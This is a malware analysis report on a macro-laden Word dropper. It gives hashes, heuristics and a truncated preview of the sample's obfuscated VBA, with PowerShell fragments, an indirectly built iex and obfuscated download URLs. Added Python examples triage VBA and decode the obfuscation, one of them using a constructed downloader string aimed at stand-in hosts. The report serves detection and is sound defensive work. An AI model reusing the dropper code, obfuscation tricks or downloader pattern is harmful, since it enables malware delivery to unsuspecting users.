Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c44563e2d7050c6a…

MALICIOUS

Office (OLE)

Size: 133.5 KB
Created: 2018-02-15 06:24:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19

MD5: 281deaa86e4e259c2c40f8e31e6f0138
SHA-1: d8e7c41c182cb2fb963489e0a1df55967434ba0e
SHA-256: c44563e2d7050c6aff14ee367e5da2bc8c479b2c3adbeee0d06e9fd5f08fae9e

Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is a Word document (OLE/CFB container) carrying a VBA project. An AutoOpen entry point runs as soon as the document is opened with macros enabled (T1204.002), and the project contains a Shell() call, so opening the file is sufficient to launch an attacker-chosen command line (T1059.005). The extracted module is heavily obfuscated: random identifiers, dead arithmetic over undefined variables (Int/Oct/Sin expressions that only run without errors because of On Error Resume Next), and a string-decoding helper (HJjkJKD) called with long blobs plus two numeric arguments. The decoded fragments visible in the preview are PowerShell: quote characters are replaced by placeholder tokens that later -creplace/-replace clauses restore (the visible clauses map [ChAr]82+[ChAr]97+[ChAr]106, i.e. "Raj", to a double quote and "DBq"/"v4w" to single quotes), string literals are cut by '+' splices, and Invoke-Expression is assembled indirectly, once from (get-Variable '*MDr*').Name[3,11,2] -Join '' (the MaximumDriveCount variable, which spells iex) and once from an index into $env:PUBLIC. The same fragments contain URL-like strings. Together this is the profile of a macro dropper/downloader that stages a PowerShell second stage, consistent with the ClamAV signature Doc.Dropper.Agent-6449211-0. The preview is truncated, so the full command line and the download URLs were not recovered in this static pass; fully decoding the HJjkJKD strings or a dynamic run would be needed to obtain them.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6449211-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6449211-0.
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA project calls Shell(), i.e. it can launch an arbitrary command line.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    An AutoOpen procedure is present; Word runs it as soon as the document opens with macros enabled, without any further user action.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule exists for p-code-only documents and source-extraction failures, where no readable source is available; here the source was recovered as well, so it corroborates the two findings above rather than adding a new one.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, and no stronger macro-virus family marker was present. The rule is written for the case where no modern VBA project was recovered, and it is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that a VBA project was recovered for this sample (see Extracted artifacts), so this hit is matching the same AutoOpen name as OLE_VBA_AUTOOPEN and adds no independent evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace that Office itself writes into documents containing drawing content; it is expected and carries no indicator value. The second-stage download URLs live in the obfuscated strings and were not recovered by this pass.
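The co-occurrence rule behind the auto-exec and execution-token findings above, written out as an added example (it is not the scanner that produced this report). It runs over decoded VBA source such as olevba's extract_macros() returns, so it covers the source-available case rather than the p-code-only case the OLE_VBA_PCODE_AUTOEXEC_EXEC rule exists for. The sample module is constructed: its two junk-arithmetic lines and the HJjkJKD call shape are copied from the preview below, while the AutoOpen procedure and the Shell line are assumed, because the preview is truncated before the code the Shell() finding refers to.

```python
"""Triage of decoded VBA source (what olevba's extract_macros() returns): the auto-exec +
execution-token co-occurrence behind a finding like OLE_VBA_PCODE_AUTOEXEC_EXEC, plus
counters for the obfuscation style seen in the preview. Added example, not the report's scanner."""
import re
from dataclasses import dataclass, field

# Procedure names Office runs without user interaction (Word AutoOpen/Document_Open,
# Excel Workbook_Open/Auto_Open, ...); matched at the procedure definition only.
AUTOEXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|AutoExec|AutoNew|AutoClose|AutoExit|Document_Open|Document_Close|"
    r"Document_New|Workbook_Open|Workbook_Activate|Auto_Open|Auto_Close)\b", re.I)
# Tokens that turn a macro into an execution or download primitive.
EXEC_TOKENS = re.compile(
    r"\b(Shell|ShellExecute|CreateObject|GetObject|WScript\.Shell|URLDownloadToFile|Run|Exec)\b", re.I)
# "x = (a - Int(b) * c / Oct(d) - (e - Sin(123)))" over undefined names: dead arithmetic
# that only runs without a type-mismatch error because of On Error Resume Next.
JUNK_ARITH = re.compile(r"^\s*\w+\s*=\s*\(.*\bInt\(.*\bOct\(.*\bSin\(\d+\)", re.I)
# helper("<long blob>", n, m): a string decoder called with two numeric key/offset arguments.
DECODER_CALL = re.compile(r'\b(\w+)\(\s*"[^"]{40,}"\s*,\s*\d+\s*,\s*\d+\s*\)')
ON_ERROR = re.compile(r"^\s*On\s+Error\s+Resume\s+Next\b", re.I)


def strip_comment(line: str) -> str:
    """Cut a trailing ' comment, ignoring apostrophes inside "..." literals (the decoded
    blobs in the preview contain '+' sequences that a naive split would truncate)."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


@dataclass
class Triage:
    autoexec: list = field(default_factory=list)       # entry points found
    exec_tokens: set = field(default_factory=set)      # execution primitives found
    on_error_resume_next: bool = False
    junk_arith_lines: int = 0
    decoder_calls: dict = field(default_factory=dict)  # helper name -> call count

    def severity(self) -> str:
        if self.autoexec and self.exec_tokens:
            return "high"      # same co-occurrence rule as the p-code heuristic above
        if self.autoexec or self.exec_tokens:
            return "medium"
        return "low"


def triage_vba(source: str) -> Triage:
    t = Triage()
    for raw in source.splitlines():
        line = strip_comment(raw)
        if not line.strip():
            continue
        m = AUTOEXEC.match(line)
        if m:
            t.autoexec.append(m.group(1))
        t.exec_tokens.update(EXEC_TOKENS.findall(line))
        if ON_ERROR.match(line):
            t.on_error_resume_next = True
        if JUNK_ARITH.match(line):
            t.junk_arith_lines += 1
        for helper in DECODER_CALL.findall(line):
            t.decoder_calls[helper] = t.decoder_calls.get(helper, 0) + 1
    return t


# CONSTRUCTED module: the junk lines and the HJjkJKD call shape are copied from the
# preview; the AutoOpen procedure and the Shell line are assumed, because the preview
# is truncated before the code that the report's Shell() finding refers to.
SAMPLE_VBA = '''Attribute VB_Name = "lwXYfJqWCt"
Sub AutoOpen()
    ' entry point runs on open when macros are enabled
    SEptGITFD
End Sub

Function SEptGITFD()
On Error Resume Next
TFlZrRDKMkt = (sPpiUlLVrdX - Int(hdwMEpCXP) * QAUBR / Oct(sGGBPHaBm) - (ViQDr - Sin(2691016)))
XEpXIT = (OJlzcVLRi) + HJjkJKD("bzfinFKSzXlfhtquLZzVpzRtAJuWFfcCLvB+bvBebvB+Nki+Nk'+'ibvBw-obDBq+DBq", 34, 189)
cmNLzYSZPjL = (obIAPRVPKQnzoJ - Int(TmclXWKZ) * waBUY / Oct(MNCEjZ) - (YcplmE - Sin(8280686)))
AXbhhCzMQ = (PJzPZJFpY) + HJjkJKD("vWhSUifIXWcz4w+v4w TJNki+NkiWSDC)Nki+Nki;DBq+DBqNki+Nki", 13, 171)
payload = XEpXIT + AXbhhCzMQ
Shell payload, 0
End Function
'''

if __name__ == "__main__":
    t = triage_vba(SAMPLE_VBA)
    print(t.severity(), t)
```

Keyword matching on source text is what olevba's analyze_macros() does with its own auto-exec and suspicious-keyword lists; the value of the p-code rule above is that it still fires when the source stream is missing or damaged, where a scan like this one has nothing to read and the p-code would first have to be disassembled (for example with pcodedmp).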

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  25929 bytes
SHA-256: 32b213338ff3a10369961a8c39492d7d81efd4cc23f567d819f44a9eb09748b9

Preview: first 1,000 lines of the extracted script (two modules, ThisDocument and lwXYfJqWCt, concatenated; truncated below).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lwXYfJqWCt"
Function SEptGITFD()
On Error Resume Next
TFlZrRDKMkt = (sPpiUlLVrdX - Int(hdwMEpCXP) * QAUBR / Oct(sGGBPHaBm) - (ViQDr - Sin(2691016)))
cmNLzYSZPjL = (obIAPRVPKQnzoJ - Int(TmclXWKZ) * waBUY / Oct(MNCEjZ) - (YcplmE - Sin(8280686)))
bDIiYsXRb = (CztCKdaFqZdC - Int(EpPAq) * Dawjd / Oct(KNAwljFiPtcIR) - (dmHLfCX - Sin(762238)))
XEpXIT = (OJlzcVLRi) + HJjkJKD("bzfinFKSzXlfhtquLZzVpzRtAJuWFfcCLvB+bvBebvB+Nki+Nk'+'ibvBw-obDBq+DBqjecbvB+Nki+NkiDBq+DBqbvBtbvNki+v4w+v4wNkiB) raNki+NkindomNki+DBq+DBqNki;TJWYYNki+NkiU '+'= .(bNkv4w+v4wi+'+'NkivBnNki+Nkie'+'N'+'DBq+DBqki+Nki'+'bNki+v4w+jGC", 34, 189)
sbwAUz = (pKMGicZR - Int(kEbVGtMW) * nDvDn / Oct(tIOOMwG) - (dEOJaSBTdWtWJ - Sin(7611292)))
JWmAJWYV = (tVNmEBUYlWzN - Int(OKEUdNwRrj) * EzUaZKRFFVVs / Oct(LCoIjcmcEbFSSY) - (vpWBmbhEhuwbF - Sin(8565066)))
UQCPF = (FsSEJb - Int(plOzIzXPI) * lYJQzU / Oct(XdzHOh) - (hkwWM - Sin(9855117)))
AXbhhCzMQ = (PJzPZJFpY) + HJjkJKD("vWhSUifIXWcz4w+v4w TJNki+NkiWSDC)Nki+Nki;DBq+DBqNki+Nki&'+'Nki+Nki(Nki+NkibvBInNki+N'+'kivobv4w+v4wvBNki+Nki+bvNki+NkiBkbvB+bNki+Nkiv'+'Nki+NkiBe-I'+'tembvB)Nki+Nki(TJWSDv4w+v'+'4wC);VsNADkHClZjCIwBwiru", 13, 171)
DjIWbdoziCP = (YMhfiR - Int(DNPYCBCJuV) * nPNhRE / Oct(QocpKABEQomfkm) - (ZhYZu - Sin(6047487)))
XRSCYnhiFfu = (QczUYvcsqvd - Int(OcwNCOWwlNW) * lVipjJr / Oct(QkYzsq) - (GcYzqCAYbb - Sin(3765160)))
ULAABmFaZM = (KXhuCGiiC - Int(mLhETTd) * wVMmQ / Oct(NQjMkwHOM) - (hmiqWtJHZtqM - Sin(3222292)))
qAAZYGH = (ihSmrqjir) + HJjkJKD("SMpoPGRNAbETPTrePla'+'ce(([ChAr]8'+'2+[ChAr]97+[ChAr]106),[STRIng][ChArv4w+v4w]34).rePlace(Nki2lfNki,Nkiu7nN'+'ki).v4w+v4wrePlace(([ChAr]98+[DBq+DBqChAr]11FKIVCEWSGA", 15, 141)
BlEmIcO = (FMENXfAztiD - Int(jmOiI) * XJkTmJTnSNX / Oct(AwIqWlE) - (ijjmjsu - Sin(829984)))
nnuRiCABUrH = (ljPOCNcwm - Int(utjNmbidG) * tPdZwwrdwmuOP / Oct(jiIAwjjt) - (MJRzStKCPoL - Sin(5462819)))
nWqvKuaV = (GpQFWwwAi - Int(iRjITdiWMzi) * PjzYknjf / Oct(DpKXSktNi) - (khdmhmkrYlSzcr - Sin(8038535)))
aCGIi = (WwFFXwtXhkm) + HJjkJKD("bvAtjGiCStMoFjsnn4 -crEpLACE([cHaR]118+[cHaR]52+[cHaR]119),[cHaR]39) |. ( $enV:PUBLIC[13]+$EnVErmonMbKFYjNAHdVISBS", 18, 77)
KHqGqt = (PlAwLuHDMShsB - Int(PUlTiXLFQzqj) * IVZwG / Oct(psMNNFFwXPCD) - (rztJSb - Sin(132154)))
cutTDfzRks = (iKUBGiu - Int(inWaEMsCHXOdYo) * NvipAOMHVGZGi / Oct(MHaLzpbjcDiHr) - (uMXpu - Sin(3900250)))
jWYQzHFql = (FXptkV - Int(AUiFKKvPnRZ) * OhSiKsXJMIijMN / Oct(GjlROTvfHZYz) - (HiYFQvGZmti - Sin(221182)))
TmiUiOFhH = (lAskJdDuil) + HJjkJKD("ljUFXbbUjtqfikTphloJjki+Nkiasfc inNki+Nki TJWADCXNki+NDBq+DBqki){Nki+Nkitv4w+v4wNki+Nkiry{TJWYYNki+NkiDBq+DBqv4w+v4wU.Nki+NkiRajDomefNki+NkiDBq+v4w+v4'+'w'+'DBqWnlmNki+NkiefNki+NkiOaNki+NkidFINAIYPIjzwjNuGMuKzZm", 22, 172)
isifilrqk = (vrChkcTQHMTq - Int(QCHboV) * fAGSzWFGQn / Oct(bntFVJmHJ) - (doNVpwkIXr - Sin(2514620)))
jrtNN = (bGukjiOXNAUor - Int(NKjzo) * LCBMtzJaVzs / Oct(KlMmLlZEtmOdUZ) - (miZcZDjiYE - Sin(6588427)))
UivlJ = (mYnBPHYdFqazu - Int(jnYoYsUTX) * vVStiHnhcunjF / Oct(wVvwXvIahBTs) - (kjqWS - Sin(109947)))
NWYLQ = (ofCAKfSBLF) + HJjkJKD("QR]70+[cHaR]81+[cHaR]113),[cHaR]36 -rEpLAce ([cHaR]68+[cHaR]66+[cHa'+'R]113),[cHaR]39) 87F & ((get-VarIABle v4w*MDr*v4w).NamE['+'3,11,2]-Joinv4wv4w)')  -crEpLACE([cHaR]56+[cHaR]55+[cHaR]70),[cHaR]12iCCHjsEfFVKQwb", 2, 197)
poKFbECLTXu = (mXUfI - Int(EjQzasPDhRQ) * RvduwXY / Oct(jGXFMuA) - (jcPXZIkWfaVkT - Sin(3501305)))
maFIRETuiRc = (zJblHX - Int(YzHvvwJLkfsXT) * BslJL / Oct(OYBotR) - (XvlJsTrDSPiMlM - Sin(3898989)))
PFzAi = (qrvwBwRqcwQd - Int(vTBiw) * PzVzDcBjcGzZ / Oct(ujLwzTzZivhwD) - (DWwdinb - Sin(989783)))
afkjo = (CwXvcjVnRZlCC) + HJjkJKD("vv4wi+Nkich.bizNki+Nki/mNki+Nkis27r/?http:Nki+Nki/Nki+Nki/cNki+NkicwNki+NkicNkv4w+v4wi+NkilNki+Nkiass.neNkiv4w+v4w+Nkit/6SNkv4w+v4wi+Nv4w+v'+'4wkirlSDBq+DBqcT/?httpDBq+DBq:NkisQRusfznArK
... (truncated)
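A decoder for the obfuscation layers that are visible in the HJjkJKD string fragments above, added here as an example; it is not part of the report or of its tooling. The token-to-quote mapping is learned from the -creplace/-replace clauses the preview shows ([cHaR]118+[cHaR]52+[cHaR]119 is v4w, [cHaR]68+[cHaR]66+[cHaR]113 is DBq, [ChAr]82+[ChAr]97+[ChAr]106 is Raj); that Nki is also a single quote is an assumption, the $env:PUBLIC lookup assumes the default C:\Users\Public, and both input strings (WRAPPER and OUTER) are constructed in the same dialect, not the recovered command line.

```python
"""Peeling the PowerShell string obfuscation visible in the decoded fragments of the
extracted macro: placeholder tokens that a later -creplace turns back into quote
characters, '+' splices of the quoted string, [char]N+[char]N concatenations, and
Invoke-Expression built from variable names. Added example for this report, not the
scanner that produced the findings; both inputs are CONSTRUCTED in the preview's dialect."""
import re


def ps_literal(value: str) -> str:
    """Render text as a PowerShell literal, double-quoted only when it contains an apostrophe."""
    return '"' + value + '"' if "'" in value else "'" + value + "'"


def unsplice(s: str) -> str:
    """Join the '+' splices of a single-quoted string: rePla'+'ce -> rePlace."""
    return s.replace("'+'", "")


CHAR_SUM = re.compile(r"(?:\[string\]\s*)?\[char\]\s*\d+(?:\s*\+\s*\[char\]\s*\d+)*", re.I)


def resolve_char_sums(s: str) -> str:
    """[ChAr]82+[ChAr]97+[ChAr]106 -> 'Raj' (PowerShell adds char+char as text)."""
    def repl(m):
        codes = re.findall(r"\[char\]\s*(\d+)", m.group(0), re.I)
        return ps_literal("".join(chr(int(c)) for c in codes))
    return CHAR_SUM.sub(repl, s)


# MaximumDriveCount is the only built-in variable matching *MDr*; indices 3,11,2 spell iex.
GETVAR_MDR = re.compile(r"\(\s*get-variable\s+'\*mdr\*'\s*\)\.name\[([\d,\s]+)\]\s*-join\s*''", re.I)
ENV_PUBLIC = re.compile(r"\$env:public\[(\d+)\]", re.I)
DEFAULT_PUBLIC = r"C:\Users\Public"   # ASSUMED default of $env:PUBLIC on the victim host


def resolve_iex_tricks(s: str) -> str:
    s = GETVAR_MDR.sub(lambda m: ps_literal("".join("MaximumDriveCount"[int(i)]
                                                     for i in m.group(1).split(","))), s)
    return ENV_PUBLIC.sub(lambda m: ps_literal(DEFAULT_PUBLIC[int(m.group(1))]), s)


# -creplace('tok'),'x' or -replace ('tok'),"'" once the char sums are resolved
REPLACE_CLAUSE = re.compile(r'''-c?replace\s*\(\s*'(\w+)'\s*\)\s*,\s*("'"|'[^']*')''', re.I)


def learn_placeholders(wrapper: str) -> dict:
    """Recover token -> character from the -replace clauses of the outer wrapper."""
    return {tok: lit[1:-1] for tok, lit in REPLACE_CLAUSE.findall(resolve_char_sums(wrapper))}


def decode_layers(outer: str, placeholders: dict) -> str:
    s = unsplice(outer)                    # 1: splices of the outer quoted string
    for tok, ch in placeholders.items():   # 2: placeholder tokens become quote characters
        s = s.replace(tok, ch)
    s = unsplice(s)                        # 3: splices that only exist after step 2
    return resolve_iex_tricks(resolve_char_sums(s))


URL = re.compile(r"https?://[^\s'\"),;]+")


def extract_urls(decoded: str) -> list:
    return URL.findall(decoded)


# CONSTRUCTED wrapper assembled from the -creplace/-replace clauses and the
# get-Variable tail that are visible in the preview above.
WRAPPER = ("-crEpLACE([cHaR]118+[cHaR]52+[cHaR]119),[cHaR]39 "
           "-rEpLAce ([cHaR]68+[cHaR]66+[cHaR]113),[cHaR]39 "
           "-rEpLAce ([ChAr]82+[ChAr]97+[ChAr]106),[STRIng][ChAr]34 "
           "| & ((get-VarIABle '*MDr*').NamE[3,11,2]-Join'')")
# Nki -> ' is an ASSUMPTION: its -replace clause is beyond the truncation, but it sits
# in the same Nki+Nki splice positions as DBq+DBq.
PLACEHOLDERS = dict(learn_placeholders(WRAPPER), Nki="'")
# CONSTRUCTED stage-two string in the preview's dialect (not the recovered payload):
# splices, three placeholder tokens, and a splice cutting through a token (Nk'+'i).
OUTER = ("$Rnd = ne'+'w-object random; $Tmp = $env:TEMP + Nki\\Nki + $Rnd.Next(1, 65536) + DBq.exeDBq; "
         "foreach ($Url in v4whv4w+v4wttp://a.invalid/x/v4w, NkihttDBq+DBqp://b.invalid/y/Nk'+'i) "
         "{ try { (ne'+'w-object net.webclient).DownloadFile($Url, $Tmp); break } catch { } }")

if __name__ == "__main__":
    print(resolve_iex_tricks(resolve_char_sums(WRAPPER)))
    print(PLACEHOLDERS)
    decoded = decode_layers(OUTER, PLACEHOLDERS)
    print(decoded)
    print(extract_urls(decoded))
```

Order matters: the '+' splices have to be joined before the tokens become quotes, because the preview shows splices cutting through tokens (Nk'+'i, [ChArv4w+v4w]34), and again afterwards, because the restored quotes create a second round of splices. The (get-Variable '*MDr*').Name[3,11,2] -Join '' tail resolves to iex through the MaximumDriveCount preference variable, so a scan that only looks for the literal strings iex or Invoke-Expression misses this sample's invocation.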